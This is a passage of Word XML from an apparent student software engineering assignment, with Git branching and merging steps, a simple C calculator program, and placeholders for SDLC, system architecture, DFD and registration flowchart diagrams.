          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>🛠️ Step 3: Collaborate on Code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Each of you can: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# Clone the repository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clone https://github.com/your-username/student-collab-project.git</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
      </w:pP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# Make changes to a file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echo "print('Hello from Ayush')" &gt; app.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
      </w:pP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# Commit and push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add app.py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commit -m "Added main app file"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push origin main</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>branches</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>pull requests</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for cleaner collaboration if working on bigger projects.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRPr="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006836E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>10. Follow a GIT tutorial to practice cloning, branching, and merging repositories.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9"/>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>🚀 Step 1: Create and Clone a Repository</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>A. Create a Repo on GitHub</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Go to </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>GitHub</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>"New Repository"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Name it </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>git-practice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Create repository</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>B. Clone It to Your Local System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clone https://github.com/your-username/git-practice.git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cd git-practice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>🌿 Step 2: Create a Branch</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>A. Create a new branch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checkout -b feature-1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>B. Make changes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echo "This is Feature 1" &gt; feature.txt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add feature.txt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git commit -m "Added feature.txt in feature-1 branch"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>🔁 Step 3: Switch and Merge Branches</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A. Go back to the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> branch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checkout main</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>B. Merge the feature branch into main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merge feature-1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1032" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hAnsi="MS Mincho" w:cs="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>☁</w:t>
      </w:r>
      <w:r>
        <w:t>️ Step 4: Push to GitHub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push origin main</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>(Optional: push the new branch if needed)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>git push origin feature-1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1033" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>🧪 Step 5: View on GitHub</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Go to your GitHub repo page. You’ll see the merged changes under </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>"Commits"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>"Files"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tab.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B3843" w:rsidRDefault="009B3843">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRPr="007C50BE" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006836E9" w:rsidRPr="007C50BE" w:rsidRDefault="006836E9" w:rsidP="006836E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C50BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>11.</w:t>
      </w:r>
      <w:r w:rsidR="009B3843" w:rsidRPr="007C50BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Create a flowchart representing the Software Development Life Cycle (SDLC).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B3843" w:rsidRDefault="009B3843" w:rsidP="006836E9"/>
    <w:p w:rsidR="009B3843" w:rsidRDefault="009B3843" w:rsidP="009B3843">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4770120" cy="4312920"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="Picture 152" descr="C:\Users\ASUS\Downloads\Software Development Life Cycl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ASUS\Downloads\Software Development Life Cycle Diagram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843" w:rsidRPr="009B3843" w:rsidRDefault="009B3843" w:rsidP="009B3843"/>
    <w:p w:rsidR="009B3843" w:rsidRDefault="009B3843" w:rsidP="009B3843"/>
    <w:p w:rsidR="009B3843" w:rsidRDefault="009B3843">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B3843" w:rsidRDefault="009B3843" w:rsidP="009B3843">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B3843">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:pict>
          <v:rect id="_x0000_s1026" style="position:absolute;margin-left:-37.8pt;margin-top:70.8pt;width:468pt;height:600.6pt;z-index:251658240">
            <v:fill r:id="rId17" o:title="Food Delivery System High Level Design-System design" recolor="t" rotate="t" type="frame"/>
          </v:rect>
        </w:pict>
      </w:r>
      <w:r w:rsidRPr="009B3843">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>12. Design a basic system architecture for a food delivery app.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B3843" w:rsidRPr="009B3843" w:rsidRDefault="009B3843" w:rsidP="009B3843">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009B3843" w:rsidRPr="009B3843" w:rsidRDefault="009B3843" w:rsidP="009B3843">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009B3843" w:rsidRPr="009B3843" w:rsidRDefault="009B3843" w:rsidP="009B3843">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009B3843" w:rsidRPr="009B3843" w:rsidRDefault="009B3843" w:rsidP="009B3843">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009B3843" w:rsidRPr="009B3843" w:rsidRDefault="009B3843" w:rsidP="009B3843">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009B3843" w:rsidRPr="009B3843" w:rsidRDefault="009B3843" w:rsidP="009B3843">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009B3843" w:rsidRPr="009B3843" w:rsidRDefault="009B3843" w:rsidP="009B3843">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009B3843" w:rsidRPr="009B3843" w:rsidRDefault="009B3843" w:rsidP="009B3843">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009B3843" w:rsidRPr="009B3843" w:rsidRDefault="009B3843" w:rsidP="009B3843">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009B3843" w:rsidRDefault="009B3843" w:rsidP="009B3843">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009B3843" w:rsidRDefault="009B3843" w:rsidP="009B3843">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009B3843" w:rsidRDefault="009B3843" w:rsidP="009B3843">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009B3843" w:rsidRDefault="009B384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B3843" w:rsidRPr="009B3843" w:rsidRDefault="009B3843" w:rsidP="009B3843">
      <w:pPr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>13.</w:t>
      </w:r>
      <w:r w:rsidRPr="009B3843">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B3843">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Develop test cases for a simple calculator program.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B3843" w:rsidRPr="009B3843" w:rsidRDefault="009B3843" w:rsidP="009B3843">
      <w:r w:rsidRPr="009B3843">
        <w:t>#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B3843" w:rsidRPr="009B3843" w:rsidRDefault="009B3843" w:rsidP="009B3843"/>
    <w:p w:rsidR="009B3843" w:rsidRPr="009B3843" w:rsidRDefault="009B3843" w:rsidP="009B3843">
      <w:r w:rsidRPr="009B3843">
        <w:t>int main() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B3843" w:rsidRPr="009B3843" w:rsidRDefault="009B3843" w:rsidP="009B3843">
      <w:r w:rsidRPr="009B3843">
        <w:t xml:space="preserve">    float num1, num2;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B3843" w:rsidRPr="009B3843" w:rsidRDefault="009B3843" w:rsidP="009B3843">
      <w:r w:rsidRPr="009B3843">
        <w:t xml:space="preserve">    char op;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B3843" w:rsidRPr="009B3843" w:rsidRDefault="009B3843" w:rsidP="009B3843"/>
    <w:p w:rsidR="009B3843" w:rsidRPr="009B3843" w:rsidRDefault="009B3843" w:rsidP="009B3843">
      <w:r w:rsidRPr="009B3843">
        <w:t xml:space="preserve">    printf("Enter expression (e.g., 5 + 3): ");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B3843" w:rsidRPr="009B3843" w:rsidRDefault="009B3843" w:rsidP="009B3843">
      <w:r w:rsidRPr="009B3843">
        <w:t xml:space="preserve">    scanf("%f %c %f", &amp;num1, &amp;op, &amp;num2);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B3843" w:rsidRPr="009B3843" w:rsidRDefault="009B3843" w:rsidP="009B3843"/>
    <w:p w:rsidR="009B3843" w:rsidRPr="009B3843" w:rsidRDefault="009B3843" w:rsidP="009B3843">
      <w:r w:rsidRPr="009B3843">
        <w:t xml:space="preserve">    switch(op) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B3843" w:rsidRPr="009B3843" w:rsidRDefault="009B3843" w:rsidP="009B3843">
      <w:r w:rsidRPr="009B3843">
        <w:t xml:space="preserve">        case '+': printf("%.2f\n", num1 + num2); break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B3843" w:rsidRPr="009B3843" w:rsidRDefault="009B3843" w:rsidP="009B3843">
      <w:r w:rsidRPr="009B3843">
        <w:t xml:space="preserve">        case '-': printf("%.2f\n", num1 - num2); break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B3843" w:rsidRPr="009B3843" w:rsidRDefault="009B3843" w:rsidP="009B3843">
      <w:r w:rsidRPr="009B3843">
        <w:t xml:space="preserve">        case '*': printf("%.2f\n", num1 * num2); break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B3843" w:rsidRPr="009B3843" w:rsidRDefault="009B3843" w:rsidP="009B3843">
      <w:r w:rsidRPr="009B3843">
        <w:t xml:space="preserve">        case '/':</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B3843" w:rsidRPr="009B3843" w:rsidRDefault="009B3843" w:rsidP="009B3843">
      <w:r w:rsidRPr="009B3843">
        <w:t xml:space="preserve">            if(num2 != 0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B3843" w:rsidRPr="009B3843" w:rsidRDefault="009B3843" w:rsidP="009B3843">
      <w:r w:rsidRPr="009B3843">
        <w:t xml:space="preserve">                printf("%.2f\n", num1 / num2);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B3843" w:rsidRPr="009B3843" w:rsidRDefault="009B3843" w:rsidP="009B3843">
      <w:r w:rsidRPr="009B3843">
        <w:t xml:space="preserve">            else</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B3843" w:rsidRPr="009B3843" w:rsidRDefault="009B3843" w:rsidP="009B3843">
      <w:r w:rsidRPr="009B3843">
        <w:t xml:space="preserve">                printf("Error: Division by zero\n");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B3843" w:rsidRPr="009B3843" w:rsidRDefault="009B3843" w:rsidP="009B3843">
      <w:r w:rsidRPr="009B3843">
        <w:t xml:space="preserve">            break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B3843" w:rsidRPr="009B3843" w:rsidRDefault="009B3843" w:rsidP="009B3843">
      <w:r w:rsidRPr="009B3843">
        <w:t xml:space="preserve">        default: printf("Invalid operator\n");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B3843" w:rsidRPr="009B3843" w:rsidRDefault="009B3843" w:rsidP="009B3843">
      <w:r w:rsidRPr="009B3843">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B3843" w:rsidRPr="009B3843" w:rsidRDefault="009B3843" w:rsidP="009B3843">
      <w:r w:rsidRPr="009B3843">
        <w:t xml:space="preserve">    return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B3843" w:rsidRDefault="009B3843" w:rsidP="009B3843">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B3843">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B3843" w:rsidRDefault="009B384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B3843" w:rsidRDefault="009B3843" w:rsidP="009B3843">
      <w:pPr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>14</w:t>
      </w:r>
      <w:r w:rsidRPr="00C90926">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C90926" w:rsidRPr="00C90926">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Create a DFD for a hospital management system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C50BE" w:rsidRDefault="00C90926" w:rsidP="009B3843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pict>
          <v:rect id="_x0000_s1027" style="position:absolute;margin-left:-34.8pt;margin-top:24pt;width:471pt;height:405.6pt;z-index:251659264">
            <v:fill r:id="rId18" o:title="Hospital-Management-System-Level" recolor="t" rotate="t" type="frame"/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24pt;height:24pt"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C50BE" w:rsidRPr="007C50BE" w:rsidRDefault="007C50BE" w:rsidP="007C50BE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007C50BE" w:rsidRPr="007C50BE" w:rsidRDefault="007C50BE" w:rsidP="007C50BE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007C50BE" w:rsidRPr="007C50BE" w:rsidRDefault="007C50BE" w:rsidP="007C50BE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007C50BE" w:rsidRPr="007C50BE" w:rsidRDefault="007C50BE" w:rsidP="007C50BE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007C50BE" w:rsidRPr="007C50BE" w:rsidRDefault="007C50BE" w:rsidP="007C50BE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007C50BE" w:rsidRPr="007C50BE" w:rsidRDefault="007C50BE" w:rsidP="007C50BE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007C50BE" w:rsidRPr="007C50BE" w:rsidRDefault="007C50BE" w:rsidP="007C50BE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007C50BE" w:rsidRPr="007C50BE" w:rsidRDefault="007C50BE" w:rsidP="007C50BE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007C50BE" w:rsidRPr="007C50BE" w:rsidRDefault="007C50BE" w:rsidP="007C50BE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007C50BE" w:rsidRPr="007C50BE" w:rsidRDefault="007C50BE" w:rsidP="007C50BE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007C50BE" w:rsidRPr="007C50BE" w:rsidRDefault="007C50BE" w:rsidP="007C50BE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007C50BE" w:rsidRDefault="007C50BE" w:rsidP="007C50BE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C90926" w:rsidRDefault="00C90926" w:rsidP="007C50BE">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007C50BE" w:rsidRDefault="007C50B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C50BE" w:rsidRPr="007C50BE" w:rsidRDefault="007C50BE" w:rsidP="007C50B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pict>
          <v:rect id="_x0000_s1028" style="position:absolute;margin-left:-36pt;margin-top:83.4pt;width:489.6pt;height:517.2pt;z-index:251660288">
            <v:fill r:id="rId19" o:title="Screenshot 2025-07-17 160801" recolor="t" rotate="t" type="frame"/>
          </v:rect>
        </w:pict>
      </w:r>
      <w:r w:rsidRPr="007C50BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>15.Draw a flowchart representing the logic of a basic online registration system.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="007C50BE" w:rsidRPr="007C50BE" w:rsidSect="00351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770" w:rsidRDefault="00273770" w:rsidP="009B3843">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="1">
    <w:p w:rsidR="00273770" w:rsidRDefault="00273770" w:rsidP="009B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770" w:rsidRDefault="00273770" w:rsidP="009B3843">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
